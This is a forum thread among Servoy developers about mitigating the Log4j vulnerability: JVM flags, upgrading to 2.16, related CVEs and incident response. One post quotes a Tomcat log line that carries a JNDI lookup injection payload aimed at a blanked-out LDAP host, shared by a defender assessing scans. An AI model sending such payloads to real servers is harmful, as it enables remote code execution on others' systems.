Log4j issues

Questions and Answers on installation, deployment, management, locking, tranasactions of Servoy Application Server

Re: Log4j issues

Postby sbutler » Mon Dec 13, 2021 8:29 pm

ROCLASI wrote:It looks like updating your JVM is no longer an effective mitigation.

Screenshot 2021-12-13 at 18.45.24.png

https://twitter.com/marcioalm/status/14 ... 5405875200

Continue focussing patching the root cause.


Code: Select all
-Dlog4j2.formatMsgNoLookups=true

Fixes that
Scott Butler
iTech Professionals, Inc.
SAN Partner

Servoy Consulting & Development
Servoy University- Training Videos
Servoy Components- Plugins, Beans, and Web Components
Servoy Guy- Tips & Resources
ServoyForge- Open Source Components
User avatar
sbutler
Servoy Expert
 
Posts: 757
Joined: Sun Jan 08, 2006 7:15 am
Location: Cincinnati, OH

Re: Log4j issues

Postby ROCLASI » Mon Dec 13, 2021 8:41 pm

I don't want to be an alarmist but (there is always a 'but'):

Cloudflare's telemetry data shows that the Log4j vulnerability had been exploited in the wild for at least 9 days prior to its public disclosure:

So to quote security researcher Jake Williams:
If you are patching Log4j today on internet facing service, you need to be doing incident response too. The reality of that someone else almost certainly beat you to it. Patching doesn't remove the existing compromise.
Robert Ivens
SAN Developer / Servoy Valued Professional / Servoy Certified Developer

ROCLASI Software Solutions / JBS Group, Partner
Mastodon: @roclasi
--
ServoyForge - Building Open Source Software.
PostgreSQL - The world's most advanced open source database.
User avatar
ROCLASI
Servoy Expert
 
Posts: 5438
Joined: Thu Oct 02, 2003 9:49 am
Location: Netherlands/Belgium

Re: Log4j issues

Postby Ruben79 » Mon Dec 13, 2021 10:13 pm

So, meaning that you should not only patch the exploit but take action aswell. The real question is of course, what should you do? On some of our servers we indeed find some 'jndi:ldap' entries in the access and catalina logs of Tomcat. These also happen from after we patched the server.
I don't want to enclose them here because this is a public forum but they look like this:
Code: Select all
x.x.x.x - - [12/Dec/2021:23:33:55 +0100] "GET /$%7Bjndi:ldap://x.x.x.x:yyyy/Exploit%7D HTTP/1.1" 404 808


How can we determine the impact? The response status of those requests is always 404, does that mean the scan failed? When I check the ip's that sent the requests, they are blocked by our Fortigate firewall.
Ruben de Jong
Stb Software Development
SAN Partner

Stb Software Development - http://www.stb.nl
User avatar
Ruben79
 
Posts: 96
Joined: Wed Apr 18, 2007 12:43 pm

Re: Log4j issues

Postby ROCLASI » Mon Dec 13, 2021 11:06 pm

Hi Ruben,

That is a good question. I am not in InfoSec. I just follow InfoSec Twitter/Blogs closely.
From what I read the current wave of malware is mostly coin miners and some malware like Mirai.
So paying close attention to CPU loads (and suspect processes) might be prudent.
Also a lot of the traffic people see is from security companies scanning the internet.
Robert Ivens
SAN Developer / Servoy Valued Professional / Servoy Certified Developer

ROCLASI Software Solutions / JBS Group, Partner
Mastodon: @roclasi
--
ServoyForge - Building Open Source Software.
PostgreSQL - The world's most advanced open source database.
User avatar
ROCLASI
Servoy Expert
 
Posts: 5438
Joined: Thu Oct 02, 2003 9:49 am
Location: Netherlands/Belgium

Re: Log4j issues

Postby Mark Voorboom » Tue Dec 14, 2021 12:19 pm

Future versions of Servoy and future LTS releases for 2020.03 and 2021.03 will ship with log4j 2.15.0 or later, where the problem has been addressed.


Hi Ron, What is the scheduled date for the next LTS releases for version 2020.03 and 2021.03?
Stb Software Development
SAN Partner
User avatar
Mark Voorboom
 
Posts: 20
Joined: Wed Aug 26, 2009 9:55 am
Location: Houten

Re: Log4j issues

Postby jcompagner » Tue Dec 14, 2021 12:24 pm

we are first busy with releasing 2021.12 (with Log4J 2.16) shortly after that the 2 LTS releases will be released (so beginning of Januari)
Johan Compagner
Servoy
User avatar
jcompagner
 
Posts: 8822
Joined: Tue May 27, 2003 7:26 pm
Location: The Internet

Re: Log4j issues

Postby ROCLASI » Tue Dec 14, 2021 1:13 pm

Hi Johan,

Can the just released Log4j 2.16 be a drop-in replacement for the version (I believe versions 2.11.2 up to 2.13) in Servoy 2019.x/2020.x/2021.x ?
We could then code sign everything again and deploy new WARs with jndi fully disabled.
Or are there incompatibles?
Robert Ivens
SAN Developer / Servoy Valued Professional / Servoy Certified Developer

ROCLASI Software Solutions / JBS Group, Partner
Mastodon: @roclasi
--
ServoyForge - Building Open Source Software.
PostgreSQL - The world's most advanced open source database.
User avatar
ROCLASI
Servoy Expert
 
Posts: 5438
Joined: Thu Oct 02, 2003 9:49 am
Location: Netherlands/Belgium

Re: Log4j issues

Postby jcompagner » Tue Dec 14, 2021 1:28 pm

i think that should just work, because thats kind of what i did over all our branches, the only thing that really is different when generating a WAR in 2020.03_LTS before and after my change is that there are 4 updates jars..
And as far as i have tested now, the logging works fine after that.
Johan Compagner
Servoy
User avatar
jcompagner
 
Posts: 8822
Joined: Tue May 27, 2003 7:26 pm
Location: The Internet

Re: Log4j issues

Postby swingman » Tue Dec 14, 2021 2:20 pm

I have a tomcat9 on Ubuntu with only command line access.
Where does the

Code: Select all
-Dlog4j2.formatMsgNoLookups=true


go?

Thanks,

Christian
Christian Batchelor
Certified Servoy Developer
Batchelor Associates Ltd, London, UK
http://www.batchelorassociates.co.uk

http://www.postgresql.org - The world's most advanced open source database.
User avatar
swingman
 
Posts: 1472
Joined: Wed Oct 01, 2003 10:20 am
Location: London

Re: Log4j issues

Postby ROCLASI » Tue Dec 14, 2021 2:29 pm

Hi Christian,

I don't know about Debian/Ubuntu but on Centos I can add it to JAVA_OPTS in tomcat.conf (in /conf)
But that worked only for the one installed via the package manager.

If you got the package directly from apache.org you need to add it to catalina.sh in /bin.

Hope this helps.
Robert Ivens
SAN Developer / Servoy Valued Professional / Servoy Certified Developer

ROCLASI Software Solutions / JBS Group, Partner
Mastodon: @roclasi
--
ServoyForge - Building Open Source Software.
PostgreSQL - The world's most advanced open source database.
User avatar
ROCLASI
Servoy Expert
 
Posts: 5438
Joined: Thu Oct 02, 2003 9:49 am
Location: Netherlands/Belgium

Re: Log4j issues

Postby jcompagner » Tue Dec 14, 2021 2:30 pm

Johan Compagner
Servoy
User avatar
jcompagner
 
Posts: 8822
Joined: Tue May 27, 2003 7:26 pm
Location: The Internet

Apache Log4j 1.x exploit and Servoy 7

Postby lwjwillemsen » Tue Dec 14, 2021 3:18 pm

What about Servoy 7 and https://cve.report/CVE-2021-4104 ?

Please an update on this one.
Lambert Willemsen
Vision Development BV
lwjwillemsen
 
Posts: 680
Joined: Sat Mar 14, 2009 5:39 pm
Location: The Netherlands

Re: Log4j issues

Postby jcompagner » Tue Dec 14, 2021 4:18 pm

as that CVE says thats not default only when you have configured a special appander the JMSAppender, Servoy didn't do that by default
Johan Compagner
Servoy
User avatar
jcompagner
 
Posts: 8822
Joined: Tue May 27, 2003 7:26 pm
Location: The Internet

Re: Log4j issues

Postby lwjwillemsen » Tue Dec 14, 2021 4:49 pm

Thanks Johan, I was looking for that confirmation.
Lambert Willemsen
Vision Development BV
lwjwillemsen
 
Posts: 680
Joined: Sat Mar 14, 2009 5:39 pm
Location: The Netherlands

Re: Log4j issues

Postby ROCLASI » Wed Dec 15, 2021 6:26 am

After CVE-2021-44228 we now have a new related vulnerability CVE-2021-45046.
This last CVE shows that Log4j version 2.15 is still vulnerable with certain attack variants. Even with -Dlog4j2.formatMsgNoLookups=true :!: .
So it seems really paramount that organisations need to start patching their servers with the latest Log4j 2.16 version, which disables the attack vector completely (jndi is disabled by default).

So to summarise the situation:

  • Updating your JVM to a specific version doesn't help. Log4j 2.x in every JVM version is vulnerable.
  • setting -Dlog4j2.formatMsgNoLookups=true will NOT block all attack variants
  • log4j 2.15 is still vulnerable, update to version 2.16.

So if you run any recent version of Servoy (8.4 and up) you can replace the log4j jars with the latest ones from apache.org
If you use SmartClient you still need to code sign these jars, for Web- and NgClient deployments this is not really necessary.

The InfoSec community is reporting that after coin miners and malware to make your server be part of botnets (Mirai and others) they now see that attackers are loading ransomware and remote access tools :!: .

@servoy maybe you need to send out an updated adviserary email.



On a lighter note. Today I learned that Log4j is pronounced 'Log Forge', not 'Log Four Jay' or any other variation.
Maybe we should rename ServoyForge to Servoy4j ;)

On an even lighter note (but is it really?) I leave you with this (credit):

IMG_4825.JPG
IMG_4825.JPG (229.2 KiB) Viewed 35392 times
Robert Ivens
SAN Developer / Servoy Valued Professional / Servoy Certified Developer

ROCLASI Software Solutions / JBS Group, Partner
Mastodon: @roclasi
--
ServoyForge - Building Open Source Software.
PostgreSQL - The world's most advanced open source database.
User avatar
ROCLASI
Servoy Expert
 
Posts: 5438
Joined: Thu Oct 02, 2003 9:49 am
Location: Netherlands/Belgium

PreviousNext

Return to Servoy Server

Who is online

Users browsing this forum: No registered users and 1 guest